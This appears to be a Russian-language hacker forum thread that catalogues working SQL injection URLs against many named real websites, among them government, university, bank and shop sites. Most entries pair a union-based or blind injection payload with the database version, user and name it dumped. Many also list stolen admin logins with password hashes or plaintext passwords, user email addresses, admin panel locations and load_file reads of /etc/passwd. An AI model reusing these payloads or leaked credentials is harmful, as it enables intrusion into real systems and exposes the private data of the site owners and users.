http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9--

readybiz@localhost:readybiz2:5.0.45-community

Pagerank: 0
тИЦ: 50

http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,table_name,4,5,6,7,8,9+from+in formation_schema.tables--

COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
accesslevels
contacts
forum
images
legalbiz_clients
legalbiz_clients_types
legalbiz_laws
legalbiz_laws_arb
linker_catalog
linker_links
mailing
news
project_types
projects
site_menus
site_users
sites
themes
users
vote_ankets
vote_answers
vote_questions
vote_types
vote_variants
xfields
xtables
clients
counter
counter_stats
legalbiz2_clients
legalbiz2_clients_types
legalbiz2_laws
legalbiz2_laws_arb
works
works_types
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
readybiz_clients
readybiz_clients_types
readybiz_laws
readybiz_laws_arb
contacts_spam
readybiz2_clients
readybiz2_clients_types
readybiz2_laws
readybiz2_laws_arb




--

http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,user(),databas e(),version())--
tokdubna@localhost:tok:5.0.51a

Pagerank: 2
тИЦ: 10

http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,table_name+from+information_s chema.tables+limit+0,1--
Вывод через limit


COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
backups
news
readypc
shop_cart
shop_catalog
shop_description
shop_images
shop_orders
shop_price
shop_setup
site_menus
site_users
sites
users
xfields
xtables


http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password ,email)+from+users+limit+0,1--

jb:68fa2f3e596f4b8aae30a00aad4916e2:CodePro:jb@ila bs.ru

http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password ,email)+from+users+limit+1,1--

strodi:2165a70e5a5808e376b5ed564a332bf1:zaslonka:s trodi@ilabs.ru

и т.д...

http://www.eg.kokushikan.ac.jp/tech-j/schedule.php?type=M&y=1954&m=6+union+select+1,null,null,null,null,null,null,n ull,version(),null,null--

PostgreSQL 7.3.4 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)

шоп!

http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5--

юзер/версия/бд:

bea_fun@localhost5.0.45bea_fun


http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,username,pas sword),3,4,5+from+user--

юзер/пасс:

admin:9fb3c27488be2c154eac22aaaba5f2ea

-------------------------------------------------------------------------
The End!

http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ ws(0x3 a,version(),database(),user()),5,6,7,8--

Database Version : 5.0.67-log
Database name : u57230
User name : u57230@10.10.10.208

все таблицы и колонки сразу, выводятся без лимита :

http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ws(0x3a,table_name,co lumn_name),5,6,7,8+from+INF ORMATION_SCHEM A.COLUMNS--

а вот и админы:

adminvs:8621e77d22f0830a46b462e3f46ed917
colibry:7bbd1c39b867f00d0b9512ce0331988a
nata:77369e37b2aa1404f416275183ab055f
coladmin:1e1277d611010823e083b3d8a6ac5ace

http://bank-ua.com/index.php?page=publishing_news&id=20200+union+select+1,2,3,4,5,6,7,8+limit+1,1/*

Version(): 5.0.32-Debian_7etch8-log
Database() bankua_db
User(): bankua_usr@localhost

http://www.letsdolunch.info/news-display.php?ID=-1+union+select+1,2,3,4,5,6,7,8/*

Database Version: 4.1.22
Database name: durhamsletsdolunch
User name: durhamsletsdolun@localhost

http://www.dapnl-pd.ro/document.php?id=-82+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12--



Database Version: 4.1.22-standard-log
Database name: dapnl_dapnl
User name: dapnl_dapnl@localhost

Шопы:

http://nocona.org/shopping.php?id=-1+union+all+select+concat_ws(0x3a,version(),user() ,database())+from+users--

версия/юзер/бд:

4.0.16-nt:nocona@www2.ithinc.net:nocona

есть таблица users
-----------------------------------------------------------------------

http://www.kohlrusch.biz/shop/shop_artikel_details.php4?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6,7,8,9,10,11,12--

версия/юзер/бд:

4.0.27-standard-log:p33764815@212.227.127.2:db69047444

-----------------------------------------------------------------------
The End!

appleservice.ru

http://www.appleservice.ru/?news_id=-1' UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user() ),6,7,8,9,10,11,12,13,14/*
5.0.26-log:nokiaservi_apple:nokiaservi_apple@localhost

http://www.sibiu.ro/ro2/cic/unact.php?id=-89+union+select+concat_ws(0x3a,version(),database( ),user()),2,3


Database Version: 5.0.45-Debian_1ubuntu3-log
Database name: mysql01db41
User name: mysql01db41@10.153.64.7

================================================== ==============
http://www.sanctuarystyle.com.au/product.php?id=1+union+select+1,2,3,user(),version (),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27/*
================================================== ==============
Database Version:4.0.24_Debian-10ubuntu2.3-log
Database name:sanctuarystyle
User name:lstefanovski@localhost
================================================== ==============
================================================== ==============
http://www.5startrophies.com.au/product.php?id=1+union+select+1,2,version(),4,5,6/*
================================================== ==============
Database Version: 5.0.45
Database name: fivestars
User name: jowang@localhost
================================================== ==============
http://www.5startrophies.com.au/admin/
5star:kerdan
================================================== ==============
================================================== ==============
http://www.spindriftcreations.com/shop.php?cat=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+ LIMIT+23,1/*
================================================== ==============
/admin/
mcnux:3ecbed76c9eaf4c11daf20f2985a35f7
================================================== ==============
================================================== ==============

http://www.primariajibou.ro/icanunturi.php?cod=1&id=-53+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4&sid



Database Version: 4.1.22-standard-log
Database name: jibou_web
User name: jibou_usr@localhost

http://www.notiprensa.info/noticias/display.php?ID=-24/**/UNION/**/SELECT/**/1,2,concat(grupo_ID,0x3a,grupo_usuario,0x3a,grupo_ password),4,5,6,7,8/**/FROM/**/npcentral.grupos/**//*

http://www.notiprensa.info/noticias/display.php?ID=-24/**/UNION/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5,6,7,8/**//*
uv0552@localhost:5.0.45-Max

http://www.eurobath.ru/?pg=&artid=9999+union+select+1,2,concat_ws(0x 3a,vers ion(),database(),user()),4,5,6--&state=2

Database Version : 5.0.67
Database name : nibs_s_sanmax
User name : nibs_sanmax@srv.nibs.ru

http://www.swissarmyvehicles.com/vehiclelist.php?cat=-1+union+select+1,2,3,4,5,6,version(),user(),databa se(),10,11,12,13/*
====
Database Version :5.0.33-log
Database name :swissarmy@localhost
User name : swissarmyvehicles_com
====
cmsadmin:AOWonTheRun(Хз где админка.....может кто найдет )
================================================== ==============
http://www.loopeez.co.uk/shop.php?cat=-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14/*
====
Database Version :5.0.22-log
Database name :loopeezco1
User name : loopeezco1@213.171.218.212
================================================== ==============
http://www.loversandfriends.nl/shop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
====
Database Version :4.1.21
Database name :loversandfriends
User name : lovers@localhost
================================================== ==============
http://www.gamezworld.de/scripte/newsletter/archive.php?id=-1+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19--
====
Database Version :5.0.67-community
Database name :db00015995
User name : dbo00015995@h556419
================================================== ==============
http://www.gbwebsols.co.uk/mk7/overview.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/*
====
Database Version :4.1.22
Database name :gbw247
User name : gbwapplication@localhost
================================================== ==============
http://www.littlewineclub.co.uk/grapevine-news-article.php?id=-1+union+select+1,2,database(),version(),user(),6,7/*
====
Database Version :4.1.20
Database name :wine
User name : lwcwines@localhost
================================================== ==============
http://www.tjs.co.uk/services.php?ID=-1+union+select+1,2,3,version(),5,6,7,8,9,user(),da tabase(),12,13,14/*
====
Database Version :4.1.20-log
Database name :tjs2005
User name : tjs2005@localhost
================================================== ==============
http://www.stauntongardencentre.co.uk/shop/category.php?cid=-1+union+select+1,2,version(),4,5,user(),7,8/*
====
Database Version :4.1.22
Database name :staunton_site
User name : staunton_site@83.223.106.10
================================================== ==============
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,user_username,3+FROM+wma_users/*
================================================== ==============
too1s:4what
--------------------------------------------------------------------------------------------------------------------

http://dalheim.business-consulting-online.info/page.php?id=-14+union+select+1,2,3,concat(user(),0x3a,version() ),5,6,7,8,9,0,1,2,3,4,5,6,7/*

Database Version: 4.1.13
Database name: dalheim
User name: dalheim@localhost

http://www.primariapn.ro/index.php?p=evenimentDetalii&id=-67'+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9/*


Version : 4.1.20
Database : primarie
User : adminsite@localhost

добавка посту выше

от diznt, нельзя так скули постить.
http://www.superherohype.com/news.php?id=27+AND+ASCII(SUBSTRING((select+y=1..3( )),1,1))>x/*
y1=version()
y2=database()
y3=user()
x1=52,46,49,46,50,50
x2=115,117,112,101,114,104,101,114,95,110,101,120, 116,114,97
x3=115,117,112,101,114,104,101,114,95,110,101,120, 116,114,97,64,115,104,104,45,110,49,45,105,110,116

Version : 4.1.22
Database : superher_nextra
User : superher_nextra@shh-n1-int

Pagerank: 4
тИЦ: 300

http://www.dimex.ru/news.php?n_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3--

Database Version : 5.0.67
Database name : dimex
User name : root@zvm2.host.ru

юзвери:

http://www.dimex.ru/news.php?n_id=-1+union+select+1,concat_Ws(0x3a,U_ LOGIN,U _PASS),3+from+USERS+limit+1,1--

--------------------------------------------+

Pagerank: 5
тИЦ: 325

http://www.vniipo.ru/books/description.php?rowid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ve rsion(),databa se(),user()),11,12,13,14,15,16,17,18,19--

Database Version : 4.0.27-max-log
Database name : vniipo_orde
User name : vniipo_orde@v3.valuehost.ru

--------------------------------------------+

Pagerank: 4
тИЦ: 325

http://www.psltd.org/news/news.php?news_id=-1+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--

Database Version : 4.1.22-standard
Database name : psltd05_spectr
User name : psltd05_sergey@localhost

http://www.nepg.info/editor/page.php?id=-9+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7/*

Database Version: 5.0.22-log
Database name: nepg
User name: nepgDBuser@localhost

http://www.nepg.info/editor/page.php?id=-9+union+select+1,2,concat(logins,0x3a,user_name,us er_id,0x3a,user_password),4,5,6,7+from+nepg.tbl_us ers+limit+1,1/*

moderator2:0db5a54a73eba82589aa82755271b773
marten4:3239b0589f225fdac005dfe3dd257a48
admin1:0db5a54a73eba82589aa82755271b773

www.intercom.ru

http://www.intercom.ru/press/index.html?id=-10+union+select+concat(user(),0x3a,database(),0x3a ,version()),2,3,4,5--

user(): intercom@localhost
database(): intercom
version(): 4.0.17

PR=4


football.alphatv.ru

http://football.alphatv.ru/news.html?id=-10+union+select+concat(user(),0x3a,database(),0x3a ,version()),2,3,4,5,6,7--

user(): football@localhost
database(): ootball
version(): 5.0.51a-12-log

PR=5

http://football.alphatv.ru/news.html?id=-10+union+select+concat(user,0x3a,password,0x3a,fil e_priv),2,3,4,5,6,7+from+mysql.user--

root:2727417e4e7bb038:Y
root:2301137474663dd6:Y
debian-sys-maint:*0220C5C9224BC30C74598ED193843487AE09BD20:Y
alpha:*BD66B1F6FB23D3DBC4E5DDF5B5FF1A4473950D95:N
forum:19f70f607ae86cfa:N
mnogo:5940e12325c5907f:N
football:30e938253a8a9594:Y
eromantica:035c3a8a4d0471db:N
john:2f0bd6315e3fe4bb:Y
john::Y
sayapin:37072e0b140f7dc7:Y
zavit:23d062547458cc22:N
sphinx:5daa5bb2161dd656:N
teleport2001:4edb331935cd80c4:N
forum2:02b3cef531f2e210:N
bugz::N
football::Y

и наконец читаем /etc/passwd

http://football.alphatv.ru/news.html?id=-10+union+select+load_file('/etc/passwd'),2,3,4,5,6,7+from+mysql.user--

дерзайте..

http://www.naiades.info/platina/page.php?id=102+union+select+version(),2,3,4,5,6+l imit+1,1/*

Database Version: 5.0.18
Database name: platina
User name: root@localhost


вывод в TITLE


http://www.naiades.info/platina/page.php?id=102+union+select+concat(username,0x3a, password),2,3,4,5,6+from+users+limit+1,1/*

admin:*AD856BA0D0DA48A154279CE87A0A28616E923903



http://www.naiades.info/platina/page.php?id=102/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4,5,6/**/LIMIT/**/1,1/*

http://www.rustrahovka.ru/companies/detail.php?ID=3+union+select+version(),2,3,4,5+lim it+1,1/*

version():5.0.45
database():rustrahovka
user():rustrahovka@localhost

http://www.idrottshuset.se/readnews.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8--

ветсяи/юзер/бд:

5.0.33-log:ih@localhost:ih

http://kabinetslovakistiky.wz.cz/article.php?id=-1+union+all+select+0,1,2,3,concat_ws(0x3a,version( ),user(),database()),5,6,7,8,9,10--

версия/юзер/бд:

5.0.67-community-log:kabinetslovak34@loki:kabinetslovak34

http://www.shp-irma.ru/big.php?id=-270'+union+select+version(),2/*
5.0.26-log

http://images4walls.com/big.php?recordID=-39+union+select+1,2,version()/*
4.1.18-standard

http://www.primaria-ilia.ro/comunicat.php?id=-5+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9--



Database Version: 5.0.67-community-log
Database name: primaria_ilia
User name: primaria_ilia@localhost

http://www.arsenal-sb.ru/news/texts/?newsid=-1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7--

Database Version : 5.0.51a-log
Database name : udb2408
User name : Uwww2408S@localhost

админ:

http://www.arsenal-sb.ru/news/texts/?newsid=-1+union+select+1,2,concat_ws(0x3a,login,pa ssword),4,5,6,7+from+b_admin--

admin:a7102f58877d7ba35af0960cbf60306b

msd.anl.gov pr 6



http://www.msd.anl.gov/groups/emc/highlights.php?id=-5%20union%20select%201,concat_ws(0x23,database(),u ser(),version()),3,4,5

database,user,version

emc#emc@localhost#5.0.51a-3ubuntu5.4-log

adminka

emc.msd.anl.gov/cgi-bin/Calcium39.pl?Op=UserLogin


texasattorneygeneral.gov pr 7


https://www.texasattorneygeneral.gov/agency/weeklyag/weekly_columns_view.php?id=-10%20union%20select%201,2,3,4,concat_ws(0x23,user( ),database(),version()),6,7,8,9,0

user,database,version

pub_edit@localhost#oag#4.0.26a

http://www.cavaletto-shoes.ru/index.php?issue_id=7+and+ascii(substring((select+1 +from+users+limit+1),1,1))%3E1--

Roomiki:r466B875

http://www.new-orleans-locksmith.net/intercom_product.php?is_id=-99999999999+union+select+1,unhex(hex(concat_ws(0x3 a,user(),database(),version()))),3
user():database():version()
root@localhost:neworleanlocksmith:4.1.15-nt

http://diglib1.cecs.missouri.edu/research2.php?rid=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
dbname: LabWebDB
DbVersion: 5.0.22-standard
Username: labweb@localhost

http://www.creativespace.at/jart/prj3/creativespace/website.jart?rel=de&reserve-mode=active&content-id=1191354857766&news_id=-1+union+select+1,concat_ws(0x3a3a,username,passwor t,skype,email,wuser_status),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+creative/*

Выборка по юзерам. Логины, пасы, мыльники.

http://www.automask.com/products/product_is.php?is_id=-99999999999+union+select+concat_ws(0x3a,user(),dat abase(),version()),2,3
user():database():version()
supertape@localhost:supertape:4.1.22-standard

ПончеГрекордингз)))) :D
http://www.fatcityrecordings.com/fcr/homeRelease.php?rid=-72+union+select+1,2,3,4,5,upass,uadmin,8,9,10,11,1 2,13,14,15,uemail,17,18,19,20+from+users+limit+1,1--

Version: 5.0.67-community
User: web160-f4tc1ty@79.170.40.160
Dbname: web160-f4tc1ty

пасс:мыло
dubwise:a.fitzgerald@fatcity.co.uk
r2d2c3po:ashley.kennerley@gmail.com

http://www.moinesti.ro/showSubmenu.php?nrd=18+AND+SUBSTRING((select+y=1.. .3())>x=33...127--

y1=version
y2=database
y3=user

x1=52,46,49,46,50,48,45,108,111,103,32,32
x2=109,111,105,110,101,115,116,105
x3=109,111,105,110,101,115,116,105,117,115,101,114 ,64,108,111,99,97,108,104,111,115,116

Version : 4.1.20-log
Databse : moinesti
User : moinestiuser@localhost

http://www.strop-nn.ru/news/?id=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6,7,8--

Database Version : 4.0.25
Database name : strop-nn
User name : strop-nn@localhost

Водоочистная Компания

http://www.waterprof.ru/news.php?nw=-113+union+select+1,2,3,4,concat(login,0x3a,passwd) ,6+from+users--

http://dot.tucsonaz.gov/news/details.cfm?id=544+union+select+1,2,3,4,5/*

version():4.1.22-log
database():tdot
user():tdot@localhost

http://dot.tucsonaz.gov/news/details.cfm?id=544+union+select+1,concat(user,0x3a ,password),3,4,5+from+mysql.user/*
Users:
root:*16BFFB1610D863AA4041CD5366439903BB023784
repl:2b4dd6d150406475
tdot:2b4dd6d150406475
suntran:3a0cf9af161d9163
rnassi:234222a00634f453

PageRank = 6


http://www.ujs.org.uk/events/?id=333231243457657654445765+union+select+1,2,conc at_ws(0x3a,version(),user(),database()),4,5,6,7,8, 9,10,11,12,13,14,15,16,17--



Database Version: 5.0.45-log
User name: mysql@127.0.0.1
Database name: ujs_events



http://www.ujs.org.uk/events/?id=333231243457657654445765+union+select+1,2,conc at_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13, 14,15,16,17+from+mysql.user--


admin : 664455ca5b1e50bc хэш MySQL: 664455ca5b1e50bc : t0ta11y




http://www.rfksolutions.co.uk/cat1_display.php?id=798798798654343324+union+selec t+1,concat_ws(0x3a,version(),user(),database()),3, 4,5,6--

Version: 4.1.22-standard
User: wwwrfks_portfoli@localhost
Database: wwwrfks_portfolio



http://oldhall.org.uk/index.php?id=8098097665434347098+union+select+1,2, 3,4,5,concat_ws(0x3a,version(),user(),database()), 7,8,9--


Version: 4.1.22-standard
User: oldhall_daveh@localhost
Database: oldhall_oldhall



http://www.plymouthcec.org.uk/custom.php?id=80980987676454809809+union+select+1, 2,3,concat_ws(0x3a,version(),user(),database())--


Version: 4.1.22
User: brayvw486@62.233.120.25
Database: brayvw486



http://www.venusdelivery.com.ar/Uso-de-producto-sex-shop.php?Id=798554443458647987+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5--


Version: 5.0.41-log
User: bda1@192.168.0.126
Database: venus2007_bddb

1soundtracks.com

http://www.1soundtracks.com/dead.php?id=-194213+union+select+user,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+from+mysql.user
http://www.1soundtracks.com/dead.php?id=-194213+union+select+password,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17+from+mysql.user
Admin:7750f26e34d42062

http://www.nswfb.nsw.gov.au/page.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17--

юзер/версия/бд:

4.0.24-nt-max-log:vs161854_1@wic036p.server-web.com:vs161854_1

-----------------------------------------------------------------------------------------------------------------------
The End!

http://www.prudentialnwct.com/cms/index.php?id=-9999+union+select+1,2,3,concat_ws(0x203a3a3a20,ver sion(),user(),database()),5,6,7,8,9,10,11,12/*


version: 4.0.26
user: prudentiuser@prudentialnwct.com
database: prudentialnwct_com_new

http://www.prudentialnwct.com/cms/index.php?id=-9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7,8,9,10,11,12/*

http://www.neodecor.ru/news/index.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user())--

Database Version : 4.1.25-log
Database name : db00071921
User name : 00071921@localhost

-------------------------------------------------------+

http://www.alfatv.ru/main.php?lang_id=1&id=13&_cat_id_=36&_ser_=2+union+select+concat _ws(0x3a,version(),database(),user())--

Database Version : 4.1.22-log
Database name : wwwalfatvru_alfa
User name : alfatv@localhost

http://www.primariarecas.ro/index.php?topic=page&id=-6+union+select+concat_ws(0x3a,version(),database() ,user())


Database Version: 5.0.67-community
Database name: recas_content
User name: recas_webuser@localhost



www.primariarecas.ro/admin

login : recas
password: nokia

http://financialservicesconsulting.info/display.php?page=-1092+union+select+1,2,3,4,5,6,7,8,9,0/*

Database Version: 4.1.22-log
Database name: gfsc_db
User name: gfsc_dbman@localhost

http://www.primariascornicesti.ro/index.php?modul=pagini&pagina=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3


Database Version: 5.0.32-Debian_7etch1-log
Database name: scornicesti
User name: scornicesti@localhost

https://www.primariascornicesti.ro/admin

вход свободный, тоьлко мало функциональная админка по мне

http://vb.by/article.php?topic=7&article=-4652+union+select+1,version(),3

vb.by
82.209.195.16
=============================
-------
Версия MySQL:
5.0.51a-log
-------
Имя базы:
vb
-------
Юзер:
vb@hosting
-------
@@basedir:
/usr/local/
-------
@@datadir:
/var/db/mysql/
-------
@@tmpdir:
/var/tmp/
-------
@@version_compile_os:
portbld-freebsd7.0
-------
mysql user:
No
-------
mysql password:
No
-------
file_priv:
No
-------
Кол-во таблиц в information_schema:
53
-------
Список таблиц из information_schema:
-------
1:CHARACTER_SETS
2:COLLATIONS
3:COLLATION_CHARACTER_SET_APPLICABILITY
4:COLUMNS
5:COLUMN_PRIVILEGES
6:KEY_COLUMN_USAGE
7:PROFILING
8:ROUTINES
9:SCHEMATA
10:SCHEMA_PRIVILEGES
11:STATISTICS
12:TABLES
13:TABLE_CONSTRAINTS
14:TABLE_PRIVILEGES
15:TRIGGERS
16:USER_PRIVILEGES
17:VIEWS
18:article
19:author
20:blog
21:blog_comment
22:cinema
23:comm_article
24:comm_baner
25:comm_date
26:comm_topic
27:comment
28:comment_block
29:concert
30:contest_comment
31:contest_image
32:contest_marks
33:contest_topic
34:exhibition
35:humor
36:mail
37:marks
38:online
39:online_person
40:online_question
41:photo
42:photo_comment
43:photo_image
44:project
45:publication
46:quest
47:quest_control
48:quest_poll
49:sport
50:theater
51:topic
52:who
53:who_link
-------
=============================
Префикс для таблицы mail (если данные не выводятся, попробуйте вставить в source_table.txt название таблицы так: префикс.таблица
-------
vb
-------
Количество колонок из таблицы mail:
-------
5
-------
Список колонок из таблицы mail:
-------
1:id
2:date
3:email
4:smail
5:status
-------
=============================
Количество значений из таблицы mail по полю id:
-------
8
-------
Данные по полям email,smail,status из таблицы mail:
-------
edcom@mail.ru:1
admin@virtualbrest.com:1
Ot_liudmila@bk.ru:1
lisaira@tut.by:1
Olga_15_92@mail.ru:1
kdn_2005@tut.by:1
artur33@012.net.il:1
2007vladimir-medved@tut.by:1


админка под .htaccess:)

Агентство Бизнес Мониторинга

http://www.r52.ru/?rid=31+and+1=0+union+select+1,version(),3,4--

______________________________________

Все о бизнесе в сфере услуг и производства России

http://www.portaluslug.ru/profile/-32227+union+select+1,concat(login,0x3a,password),3 ,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43+from+users+limit+1,1--.html

Файл При Y, но ковычик слэшируются

http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,file_priv,5,6,7,8,9+from+mysq l.user/*

Пассы

root:57f7a24f45500f72:cru1ser

Сайт сервисного центра «Nokia»

http://nokiaservice.ru/?news_id=14'+and+substring((select+password+from+u sers+where+username='admin'),1,5)='aikon'/*

http://nokiaservice.ru/admin/
____________________________

Shaitan-Devil:

1. Ну и что, подумаешь, кавычки слэшируются.
2. file_priv "N", а не "Y".

Правильный запрос:

http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,concat(user,0x3a,file_priv),5 ,6,7,8,9+from+mysql.user+limit+3,1/*

http://megaspace.com.br/base.php?menuId=5&categoriaPaiId=-1+union+select+1,load_file('/etc/passwd'),3/*

Кратко и ясно =)

http://avers33.ru

http://avers33.ru/view_articles.php?id=-47'+union+select+1,2,3,4,5,6,version(),8,9,10,11,1 2,13,14--+
Database Version:5.0.37
Login: planer
password: :(
email: m-planer@mail.ru
Database name: avers33ru

http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('UTILIS_Stats_Browsers'))--

Database Version:Microsoft SQL Server 2005 - 9.00.1406.00
Database name:art
User name:LMYS-S01\IUSR_LMYS-S01
-----------------------------------------------------------------------
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('UTILIS_Stats_Browsers','UTILIS_Stats_Config', 'UTILIS_Stats_OSes','UTILIS_Stats_Paths','UTILIS_S tats_Refs','UTILIS_Stats_Stats','Content','Dealers ','Distributors','FAQ','FAQ_Sections','File_Catego ries','Files','Friends','Misc_Content','Press_Rele ases','Product_Categories','Product_Models','Produ ct_Types','Reviews','Specs_ARTcessories','Specs_Au dio_Utilities','Specs_Crossovers','Specs_Digital_C onverters','Specs_Direct_Boxes','Specs_DSP','Specs _Effects_Processors','Specs_Graphic_EQ','Specs_Mic _Paks','Specs_Mic_Preamps','Specs_Power_Amps','Spe cs_Power_Conditioners','Specs_Studio_Monitors','Sp ecs_Tube_Compressors','Splash_Content','Splash_Int ros','UTILIS_Access_Level','UTILIS_Config','UTILIS _Mail_Categories','UTILIS_Mail_Clients','UTILIS_Ma iling_List','UTILIS_Permissions','UTILIS_Preferenc es','UTILIS_Users'))--
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+User_name+fro m+UTILIS_Users)--
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+password+from +UTILIS_Users)--
-----------------------------------------------------------------------
'whelman' 'YXN0cmFs'

Странно(=.

http://budutdeti.ru/php/content.php?group=3&id=-79+union+select+1,concat_ws(0x3a,pass,login),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+us ers+--+

о_О

2:1

http://www.primariacurtici.ro/?x=arata_articol&id=-220+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9



Database Version: 4.1.22-standard-log
Database name: primaria_curtici
User name: primaria_curtici@localhost

http://www.frndz.biz/page.php?ID=-5+union+select+1,2/*

Database Version: 4.1.22-standard
Database name: signdrop_FRNDZ
User name: signdrop_frndz@localhost

http://www.primariagiarmata.ro/stiri_view.php?ID=-7+union+select+1,version(),database(),user()


Database Version: 4.1.22-standard
User name: domvisio_giarmata
User name: domvisio_giarmat@localhost

http://www.andrewjones.com.au/media.centre/calendar/event.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10--

версия/юзер/бд:

5.0.67-community-log:netcon_cmsuser@localhost:netcon_cms

-----------------------------------------------------------------------------------------------------------------------------
The End!

auction.mxc.ru

http://auction.mxc.ru/?chap=viewgood&id=275+union+select+1,2,3,concat_ws(0x3A,@@version ,user(),database()),5--+

5.0.32-Debian_7etch6-log
auction_user@localhost
auction_mxc_ruр

www.truck.ru PR-4 ТиЦ - 650

http://www.truck.ru/statiy.php?art=-8589+union+select+1,2,3,concat_ws(0x3A,username,us er_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18+ from+truck.phpbb_users+where+user_level=1+--+

админ(хеш так и не побрутил):
x86:d71fcaf80885603f64d1648b509438b3

6 Версия мускуля, впервые встречаю в живой природе-


http://sorter.ru/popup_mes.cph?idmes=496260+union+select+concat_ws( 0x3A,user(),version(),database())--+


SORTER@LOCALHOST
6.0.9-ALPHA-LOG
SORTER_ANNOUN

http://www.irmca.org/memberinfo.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8,9,10,11,12,13,14--

версия/юзер/бд:

4.0.12-nt:admin_irmca@localhost:irmca_org_-_content
----------------------------------------------------------------------
http://www.plm-conference.org/index.php?section=-1+union+all+select+0,1,2,3,4,5,6,7,concat_ws(0x3a, version(),user(),database()),9,10,11,12,13--

версия/юзер/бд:

